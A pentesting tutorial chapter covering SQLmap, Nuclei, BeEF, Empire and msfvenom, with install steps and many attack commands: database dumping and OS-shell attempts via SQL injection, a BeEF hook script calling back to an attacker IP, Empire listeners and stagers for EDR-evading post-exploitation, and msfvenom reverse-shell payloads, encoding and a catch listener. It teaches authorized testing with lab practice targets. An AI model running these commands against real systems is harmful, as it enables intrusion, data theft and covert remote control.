Metasploit is the framework everyone knows. These are the tools that fill the gaps it leaves — specialized, precise, and in many cases more effective than Metasploit for their specific use case. A complete exploitation toolkit uses all of them.
🔰 Beginners: Each tool in this section is explained from scratch — what it does, why you would use it, and how to install it on every platform. Start with SQLmap since it is the most commonly needed.
⚡ Seasoned practitioners: The "When Automated Is Right" section at the bottom is worth reading — it covers the strategic decision of when to put these tools down. Jump to any specific tool directly from the contents.
- SQLmap — Automated SQL Injection
- Nuclei — Vulnerability Scanner and Exploiter
- BEEF — Browser Exploitation Framework
- Empire — Post-Exploitation Framework
- msfvenom — Standalone Payload Generator
- When Automated Is Right — And When It Is Not
- CTF vs Real World
SQL injection is a technique where an attacker inserts database commands into a place that was only supposed to accept regular text — like a search box or a login form. The database executes those commands because it cannot tell the difference between legitimate input and malicious input.
Imagine a librarian who follows instructions written on request slips. You are supposed to write "find me a book about dogs." SQL injection is writing "find me a book about dogs — and also tell me every password in your filing cabinet." If the librarian does not check what they are reading, they just do it.
SQLmap automates the process of finding and exploiting these weaknesses. It tests hundreds of injection techniques automatically, identifies which ones work, and then extracts data from the database.
# Kali Linux — pre-installed
sqlmap --version
# Update SQLmap
sqlmap --update
# Other Linux / macOS
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py --version
# Windows
# Download from https://sqlmap.org
# Or use via WSL2 with Kali (recommended)
# Run with: python3 sqlmap.py# Test a URL for SQL injection
sqlmap -u "http://target.com/page?id=1"
# Test a URL and automatically dump the database
sqlmap -u "http://target.com/page?id=1" --dump
# Test with a specific parameter
sqlmap -u "http://target.com/page?id=1&name=test" -p id
# Test a POST request
sqlmap -u "http://target.com/login" --data "username=admin&password=test"
# Test with cookies (for authenticated pages)
sqlmap -u "http://target.com/profile?id=1" --cookie "session=abc123"# List all databases on the server
sqlmap -u "http://target.com/page?id=1" --dbs
# List all tables in a specific database
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# List all columns in a specific table
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --columns
# Dump everything from a specific table
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
# Dump specific columns only
sqlmap -u "http://target.com/page?id=1" -D database_name -T users -C username,password --dump# Attempt to get an OS shell through SQL injection
sqlmap -u "http://target.com/page?id=1" --os-shell
# Attempt to get a SQL shell
sqlmap -u "http://target.com/page?id=1" --sql-shell# Set risk and level (1-5, higher = more aggressive and thorough)
sqlmap -u "http://target.com/page?id=1" --level=3 --risk=2
# Use a random user agent to avoid detection
sqlmap -u "http://target.com/page?id=1" --random-agent
# Add a delay between requests (stealth)
sqlmap -u "http://target.com/page?id=1" --delay=2
# Follow redirects
sqlmap -u "http://target.com/page?id=1" --follow-redirects
# Save and resume a session
sqlmap -u "http://target.com/page?id=1" --session=mysession
sqlmap -u "http://target.com/page?id=1" --resume
# Use a proxy (route through Burp Suite)
sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"
# Batch mode — answer yes to all prompts automatically
sqlmap -u "http://target.com/page?id=1" --batch# Save the HTTP request from Burp Suite as a file (request.txt)
# Then feed it directly to SQLmap
sqlmap -r request.txt
# SQLmap reads all headers, cookies, and POST data automatically
# This is the cleanest way to test authenticated or complex requestsPractice target: DVWA (Damn Vulnerable Web Application), HackTheBox — any box with a web application and a database backend.
Nuclei is a fast, template-based vulnerability scanner. A template is a small file that describes how to check for a specific vulnerability — what to send, what response to look for, what it means if that response appears.
Think of it like a checklist that runs itself. Instead of manually checking whether a web server is running a vulnerable version of software, Nuclei sends the right test automatically and tells you whether the check passed or failed.
The power of Nuclei is its template library — thousands of templates maintained by the security community, covering CVEs, misconfigurations, exposed panels, default credentials, and more.
# Kali Linux
sudo apt install nuclei
# macOS
brew install nuclei
# Linux / macOS — direct install
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Windows
# Download the binary from:
# https://github.com/projectdiscovery/nuclei/releases
# Extract and add to PATH
# Or use WSL2 with Kali
# Update Nuclei and its templates
nuclei -update
nuclei -update-templates# Scan a single target with all templates
nuclei -u http://target.com
# Scan a list of targets
nuclei -l targets.txt
# Scan for specific severity levels
nuclei -u http://target.com -severity critical,high
# Scan with a specific template
nuclei -u http://target.com -t cves/2021/CVE-2021-44228.yaml
# Scan with a specific template category
nuclei -u http://target.com -t cves/
nuclei -u http://target.com -t exposures/
nuclei -u http://target.com -t default-logins/
nuclei -u http://target.com -t misconfigurations/
# Save results to a file
nuclei -u http://target.com -o results.txt
# JSON output for processing
nuclei -u http://target.com -json -o results.jsoncves/ ← checks for specific CVEs
exposures/ ← finds exposed files and panels
default-logins/ ← tests default username/password combinations
misconfigurations/ ← finds security misconfigurations
takeovers/ ← subdomain takeover vulnerabilities
network/ ← network protocol vulnerabilities
fuzzing/ ← parameter fuzzing templates# Step 1 — discover what is running
nmap -sV -sC target.com -oN nmap.txt
# Step 2 — run Nuclei against discovered web services
nuclei -u http://target.com -severity critical,high,medium
# Step 3 — investigate findings manually
# Nuclei tells you what it found — you decide what to do with itPractice target: Any web application — Nuclei is safe to run against authorized targets and CTF boxes.
BEEF stands for Browser Exploitation Framework. Where most exploitation tools target servers and operating systems, BEEF targets web browsers.
Here is how it works: BEEF provides a small JavaScript snippet — a hook — that you get a victim's browser to load. Once loaded, that hook connects their browser back to your BEEF server and keeps it connected. From that point you can send commands to their browser, see what they are browsing, perform actions as if you were sitting at their keyboard, and launch further attacks against their system.
Think of it as hijacking the remote control of someone's browser.
This is especially relevant in scenarios where you have found a Cross-Site Scripting (XSS) vulnerability — a place on a website where you can inject JavaScript that runs in other users' browsers. BEEF turns that XSS vulnerability into a persistent browser backdoor.
# Kali Linux — pre-installed
beef-xss
# If not installed
sudo apt install beef-xss
# macOS
brew install beef
# Windows
# Use WSL2 with Kali — BEEF on native Windows is complex
# Inside WSL/Kali:
sudo apt install beef-xss
# Start BEEF
beef-xss
# Default web interface: http://127.0.0.1:3000/ui/panel
# Default credentials: beef / beef (change these immediately)The hook is a JavaScript file hosted by your BEEF server:
<!-- This is what you inject into a vulnerable page -->
<script src="http://YOUR-IP:3000/hook.js"></script>When a victim's browser loads this script — whether through an XSS vulnerability, a phishing page, or a malicious link — their browser connects to your BEEF server and appears in your control panel.
Information gathering:
→ Browser type, version, and plugins
→ Operating system
→ Screen resolution
→ Cookies (non-HttpOnly)
→ Visited URLs
→ Network information
Social engineering:
→ Display fake login prompts
→ Show fake plugin update notifications
→ Redirect to phishing pages
→ Display fake alerts
Further exploitation:
→ Launch browser exploits against the hooked browser
→ Port scan the victim's internal network FROM their browser
→ Attempt to exploit the victim's browser plugins
→ Tunnel traffic through the hooked browser
Step 1 → Find an XSS vulnerability on the target web application
Step 2 → Inject the BEEF hook via the XSS vulnerability
Step 3 → Wait for users to load the affected page
Step 4 → Hooked browsers appear in your BEEF control panel
Step 5 → Launch commands against hooked browsers
Step 6 → Use browser access as a foothold for deeper network access
Practice target: DVWA has XSS challenges perfect for BEEF practice.
Empire is a post-exploitation framework — meaning it is designed for what you do AFTER you have already gained access to a system, not for the initial break-in.
Where Metasploit's Meterpreter is powerful but increasingly detected by modern security tools, Empire was designed specifically to operate in environments with endpoint detection and response (EDR) software — the kind of security tools that large organizations use to detect attackers inside their networks.
Empire uses PowerShell (Windows) and Python (Linux/macOS) agents that communicate with your server in ways that blend in with normal network traffic, making them harder to detect than traditional tools.
It is the tool of choice when you need to operate quietly inside a network after initial access — the kind of tool that nation-state actors and advanced red teams use.
# Kali Linux
sudo apt install powershell-empire
# Or from source (recommended for latest version)
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
# macOS
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
# Windows
# Use WSL2 with Kali — Empire is Linux/macOS native
# Inside WSL/Kali follow the Linux instructions
# Start Empire server
sudo powershell-empire server
# Start Empire client (separate terminal)
sudo powershell-empire clientListeners — your server that agents connect back to:
# In Empire client
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://YOUR-IP
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > executeStagers — the initial payload that runs on the target:
# Generate a PowerShell stager for Windows
(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http
(Empire: stager/windows/launcher_bat) > execute
# Empire outputs the stager code to run on the targetAgents — active connections from compromised machines:
# List all active agents
(Empire) > agents
# Interact with an agent
(Empire) > interact AGENT_NAME
# Run a command
(Empire: AGENT_NAME) > shell whoami
# Load a module
(Empire: AGENT_NAME) > usemodule situational_awareness/host/winenum
(Empire: AGENT_NAME/winenum) > executeMeterpreter Empire
────────────────────────────────────────────────────────
Well-known signatures Less common signatures
Detected by most EDR Designed to evade EDR
Binary payload Pure PowerShell/Python
Easier to detect in memory Harder to detect
Great for CTF Better for real engagements
Practice target: Empire is best practiced in a lab environment with a Windows VM. HTB Pro Labs and PentesterLab Pro have suitable environments.
msfvenom is the payload generator from Metasploit — but it works completely standalone without needing msfconsole running. It creates malicious files that, when executed on a target, connect back to you or give you a shell.
Think of it as a factory that builds different types of traps. You specify what type of trap (payload), what it should do (connect back to you), and what format to wrap it in (EXE, PDF, APK, script), and msfvenom produces the file.
msfvenom -p [PAYLOAD] [OPTIONS] -f [FORMAT] -o [OUTPUT FILE]
# Windows reverse shell EXE
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f exe -o shell.exe
# Windows 64-bit reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f exe -o shell64.exe
# Linux reverse shell ELF binary
msfvenom -p linux/x86/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f elf -o shell.elf
# Linux 64-bit reverse shell
msfvenom -p linux/x64/shell_reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f elf -o shell64.elf
# PHP reverse shell (web server targets)
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f raw -o shell.php
# Python reverse shell
msfvenom -p cmd/unix/reverse_python \
LHOST=YOUR-IP LPORT=4444 \
-f raw -o shell.py
# Bash reverse shell script
msfvenom -p cmd/unix/reverse_bash \
LHOST=YOUR-IP LPORT=4444 \
-f raw -o shell.sh
# Android APK
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f apk -o malicious.apk
# ASP web shell (old IIS servers)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f asp -o shell.asp
# ASPX web shell (modern IIS)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f aspx -o shell.aspx
# JSP web shell (Java servers — Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-f raw -o shell.jsp# Encode with shikata_ga_nai (common encoder)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=YOUR-IP LPORT=4444 \
-e x86/shikata_ga_nai -i 3 \
-f exe -o encoded_shell.exe
# List all available encoders
msfvenom --list encoders
# List all available formats
msfvenom --list formats
# List all available payloads
msfvenom --list payloads | grep windows
msfvenom --list payloads | grep linuxAfter generating and delivering a payload you need a listener to catch the connection when it comes back:
# In msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR-IP
set LPORT 4444
runThe payload in your listener MUST match the payload you generated with msfvenom. Mismatched payloads produce no connection or garbage.
Plain English: Automated tools are powerful but they are not always the right choice. Understanding when to use them and when to put them down is as important as knowing how to use them.
✅ You are in a CTF and speed matters
✅ You need to test many targets quickly
✅ A well-tested module exists for your exact target
✅ You want to confirm a vulnerability before going manual
✅ You are in a lab environment learning the basics
✅ The scope of an engagement explicitly allows automated tools
✅ You are on the OSCP exam (Metasploit restricted)
✅ Stealth matters — automated tools are noisy
✅ The automated tool is not working and you need to understand why
✅ No module exists for your target
✅ You want to actually learn what is happening under the hood
✅ The environment is fragile — automated tools can crash services
✅ You need to modify the exploit for a slightly different version
Automated tools can hide your gaps. If SQLmap finds the injection and dumps the database for you — do you know how to do that manually? If Metasploit gets you a shell — do you know what the exploit actually sent? If Nuclei finds the vulnerability — do you know how to verify it without Nuclei?
The best practitioners use automated tools for efficiency while maintaining the ability to do everything manually when they need to.
The Manual Exploitation section exists precisely for this reason.
| CTF | Real Engagement | |
|---|---|---|
| SQLmap | Use freely | Check scope, use with care |
| Nuclei | Great for quick recon | Excellent for attack surface mapping |
| BEEF | Perfect for XSS practice | Requires XSS vulnerability first |
| Empire | Overkill for most CTFs | Ideal for long-term access |
| msfvenom | Use freely | Encode payloads, use common ports |
| Noise level | Not a concern | Everything generates logs |
| Documentation | Optional | Mandatory |
| Resource | What It Covers |
|---|---|
| Metasploit | The full Metasploit workflow |
| Manual Exploitation | When tools fail or are restricted |
| Exploit Categories | Understanding what you are exploiting |
| Evasion | Making automated tools less detectable |
| Shells | What to do with the access you get |
by SudoChef · Part of the SudoCode Pentesting Methodology Guide